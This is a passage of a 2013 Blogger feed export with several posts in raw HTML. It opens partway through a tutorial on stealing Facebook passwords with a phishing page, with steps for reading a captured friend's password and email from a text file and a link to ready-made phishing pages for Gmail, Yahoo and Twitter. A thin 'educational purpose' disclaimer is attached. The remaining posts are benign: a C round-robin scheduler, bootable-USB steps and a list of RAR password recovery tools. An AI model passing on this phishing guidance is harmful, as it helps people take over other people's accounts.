style=&quot;color: #990000;&quot;&gt;&lt;u&gt;&amp;nbsp;username.txt.&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;div class=&quot;separator&quot; style=&quot;border: none; clear: both; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: center;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicpzvjIVlLMjLTOD5Nl9J1D8RIq3GdJDDLMSsrzRNFifEFijrADl08DWuT-gTKjIglMnEvBjxympWQ6fHB7BA0aQFqwe9jA5C7Hj62Un5qpBxog81NpNQLTGl-80z9JWEEZ2M1DUtvKOI/s1600/Untitled+5.png&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-align: left; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicpzvjIVlLMjLTOD5Nl9J1D8RIq3GdJDDLMSsrzRNFifEFijrADl08DWuT-gTKjIglMnEvBjxympWQ6fHB7BA0aQFqwe9jA5C7Hj62Un5qpBxog81NpNQLTGl-80z9JWEEZ2M1DUtvKOI/s1600/Untitled+5.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 4px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; display: block; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;19.&lt;/span&gt;Click on view now u will have your friend&#39;s&lt;span style=&quot;color: #990000;&quot;&gt;&lt;u&gt;&amp;nbsp;password&lt;/u&gt;&lt;/span&gt;&amp;nbsp;and&lt;span style=&quot;color: #990000;&quot;&gt;&lt;u&gt;&amp;nbsp;email id.&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;div class=&quot;separator&quot; style=&quot;border: none; clear: both; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: center;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiggNhjQ_pjuRQRt3jGv0cu5A6IRTsT5OAfoQxpTQaYiWqC5ZOX9JhU1ux97A_mCyZqVlN8FJ24fyrxdf1evUvmXH_uSH6Loj_A4Kb1pUnyRn5jk7gedamsSxsJtawK4i_qnW_jHDu-bx0/s1600/Untitled+6.png&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-align: left; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiggNhjQ_pjuRQRt3jGv0cu5A6IRTsT5OAfoQxpTQaYiWqC5ZOX9JhU1ux97A_mCyZqVlN8FJ24fyrxdf1evUvmXH_uSH6Loj_A4Kb1pUnyRn5jk7gedamsSxsJtawK4i_qnW_jHDu-bx0/s1600/Untitled+6.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 4px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; display: block; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;color: #990000; font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;20.&lt;/span&gt;This is a simple trick to hack any&amp;nbsp;Facebook&amp;nbsp;password account by phishing page.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;21.&lt;/span&gt;If you are not able to create a phishing page then i will provide u a video tutorial link,look&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; in to the description of that video u will find a prepared module of phishing pages,download &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; it and enjoy.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://www.youtube.com/watch?v=RVHviWhOyWk&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;&quot;&gt;click here to view a video tutorial with the readymade phishing pages....&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;h3 style=&quot;border: none; color: #232323; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 22px; font-weight: normal; line-height: 28px; list-style: none; margin: 0px 0px 0.818em; outline: none; padding: 0px;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;color: #cc0000; font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;u&gt;note:&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;phishing is a illegal activity so don&#39;t try on anyone.this tutorial is for educational purpose.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;Not only&amp;nbsp;Facebook&amp;nbsp;u can make any phishing page of any website by following these steps....&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;u can hack Gmail,Yahoo,Orkut,Twitter and many more.....&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/4297682195689319687/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/hack-facebook-password-using-phishing.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/4297682195689319687'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/4297682195689319687'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/10/hack-facebook-password-using-phishing.html' title='Hack Facebook Password Using Phishing Page'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHcRitlwdCkzheu9FZgWYG0gAIofF1aAFRTDKLTuabt2MPlTryVf9ub8QGLPtEklpy5BTLbnyBbnJzxvDc2PQu9rc4BI1JQB9bpxzeYgZDSev1l6-Tv4ucz5_5GinPsekNed7cE3wTgUw/s72-c/images+%288%29.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-1390134260884861893</id><published>2013-09-29T15:36:00.000+05:30</published><updated>2013-10-24T15:14:22.719+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>Program for Round Robin Scheduling Algorithm in C</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Round robin is a CPU process scheduling algorithm. in this scheduling, cpu allots a fixed time slice or time quantum to each process in a queue. The process terminates, leaves the queue.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
#include&amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include&amp;lt;conio.h&amp;gt;&lt;br /&gt;
void main()&lt;br /&gt;
{&lt;br /&gt;
int st[10], bt[10], wt[10], tat[10], n, tq;&lt;br /&gt;
int i, count=0, swt=0, stat=0, temp, sq=0;&lt;br /&gt;
float awt=0.0, atat=0.0; &amp;nbsp; &amp;nbsp;clrscr();&lt;br /&gt;
printf(&quot;Enter no. of processes (Gourav) : &quot;);&lt;br /&gt;
scanf(&quot;%d&quot;, &amp;amp;n);&lt;br /&gt;
printf(&quot;\nEnter burst time for processes-- &quot;);&lt;br /&gt;
for(i=0; i&amp;lt;n;i++)&lt;br /&gt;
{&lt;br /&gt;
printf(&quot;\nProcess P%d : &quot;,i+1);&lt;br /&gt;
scanf(&quot;%d&quot;, &amp;amp;bt[i]);&lt;br /&gt;
st[i]=bt[i];&lt;br /&gt;
}&lt;br /&gt;
printf(&quot;\nEnter time slice : &quot;);&lt;br /&gt;
scanf(&quot;%d&quot;, &amp;amp;tq);&lt;br /&gt;
while(1)&lt;br /&gt;
{&lt;br /&gt;
for(i=0, count=0;i&amp;lt;n;i++)&lt;br /&gt;
{&lt;br /&gt;
temp=tq;&lt;br /&gt;
if(st[i]==0)&lt;br /&gt;
{&lt;br /&gt;
count++;&lt;br /&gt;
continue;&lt;br /&gt;
}&lt;br /&gt;
if(st[i]&amp;gt;tq)&lt;br /&gt;
{&lt;br /&gt;
st[i]=st[i]-tq;&lt;br /&gt;
}&lt;br /&gt;
else&lt;br /&gt;
if (st[i]&amp;gt;=0)&lt;br /&gt;
{&lt;br /&gt;
temp=st[i];&lt;br /&gt;
st[i]=0;&lt;br /&gt;
}&lt;br /&gt;
sq=sq+temp;&lt;br /&gt;
tat[i]=sq;&lt;br /&gt;
}&lt;br /&gt;
if(n==count)&lt;br /&gt;
break;&lt;br /&gt;
}&lt;br /&gt;
for(i=0;i&amp;lt;n;i++)&lt;br /&gt;
{&lt;br /&gt;
wt[i]=tat[i]-bt[i];&lt;br /&gt;
swt=swt+wt[i];&lt;br /&gt;
stat=stat+tat[i];&lt;br /&gt;
}&lt;br /&gt;
awt=(float)swt/n;&lt;br /&gt;
atat=(float)stat/n;&lt;br /&gt;
printf(&quot; \n process no. &amp;nbsp;burst time &amp;nbsp; wait time &amp;nbsp; turn around time&quot;);&lt;br /&gt;
for(i=0; i&amp;lt;n; i++)&lt;br /&gt;
{&lt;br /&gt;
printf(&quot;\n%d\t\t %d\t\t %d\t\t %d&quot;, i+1, bt[i], wt[i], tat[i]);&lt;br /&gt;
}&lt;br /&gt;
printf(&quot;\naverage wait time is %fnaverage turn_around_time is %fn&quot;, awt, atat);&lt;br /&gt;
getch();&lt;br /&gt;
}&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/1390134260884861893/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/program-for-round-robin-scheduling.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1390134260884861893'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1390134260884861893'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/program-for-round-robin-scheduling.html' title='Program for Round Robin Scheduling Algorithm in C'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-6310446981176438674</id><published>2013-09-22T16:03:00.001+05:30</published><updated>2013-09-22T16:03:41.203+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Applications"/><category scheme="http://www.blogger.com/atom/ns#" term="Computer"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>How to Create Bootable Pendrive in few Easy steps</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Steps- (for any Windows/Linux version)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;1. Download ISO image of the operating system you want to boot, from internet by googling it.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;2. Download&amp;nbsp;&lt;a href=&quot;http://www.poweriso.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;PowerIISO&lt;/a&gt;&amp;nbsp;.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;3. Install it and continue unregistered.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;4. Open Tools --&amp;gt; Create Bootable USB Drive.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;5. Select ISO image and the Pendrive you want to boot by browsing it.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;6. Click &lt;b&gt;Start&lt;/b&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;7. Done.&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/6310446981176438674/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/how-to-create-bootable-pendrive-in-few.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/6310446981176438674'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/6310446981176438674'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/how-to-create-bootable-pendrive-in-few.html' title='How to Create Bootable Pendrive in few Easy steps'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-1749222856158136714</id><published>2013-09-22T15:31:00.000+05:30</published><updated>2013-09-22T16:11:27.410+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Applications"/><category scheme="http://www.blogger.com/atom/ns#" term="Computer"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>How to break WinRar password</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;Use a RAR password recovery software, such as:&lt;/span&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;ZIP RAR ACE Password Recovery&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;a href=&quot;http://www.keylack.com/zip-rar-ace-password-recovery.html&quot; rel=&quot;nofollow&quot; style=&quot;background-color: white; color: #006699; font-family: arial, helvetica, clean, sans-serif; line-height: 16px; text-decoration: none;&quot; wrc_done=&quot;true&quot;&gt;http://www.keylack.com/zip-rar-ace-passw…&lt;/a&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;RAR Password Cracker&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;a href=&quot;http://www.rarpasswordcracker.com/&quot; rel=&quot;nofollow&quot; style=&quot;background-color: white; color: #006699; font-family: arial, helvetica, clean, sans-serif; line-height: 16px; text-decoration: none;&quot; wrc_done=&quot;true&quot;&gt;http://www.rarpasswordcracker.com/&lt;/a&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;or use ALZip, an archiving software which supports cracking&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;RAR passwords&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://www.altools.net/&quot; rel=&quot;nofollow&quot; style=&quot;background-color: white; text-decoration: none;&quot; wrc_done=&quot;true&quot;&gt;http://www.altools.net/&lt;/a&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;None of them is free but you can use their trial versions.&lt;/span&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;Hope this helps :)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: arial, helvetica, clean, sans-serif; line-height: 16px;&quot;&gt;Drop a comment plz :)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/1749222856158136714/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/how-to-break-winrar-password.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1749222856158136714'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1749222856158136714'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/how-to-break-winrar-password.html' title='How to break WinRar password'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-3232455324443882470</id><published>2013-09-16T19:16:00.002+05:30</published><updated>2013-09-19T13:51:21.833+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computer"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>Compress Big Files Into Small Files</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;
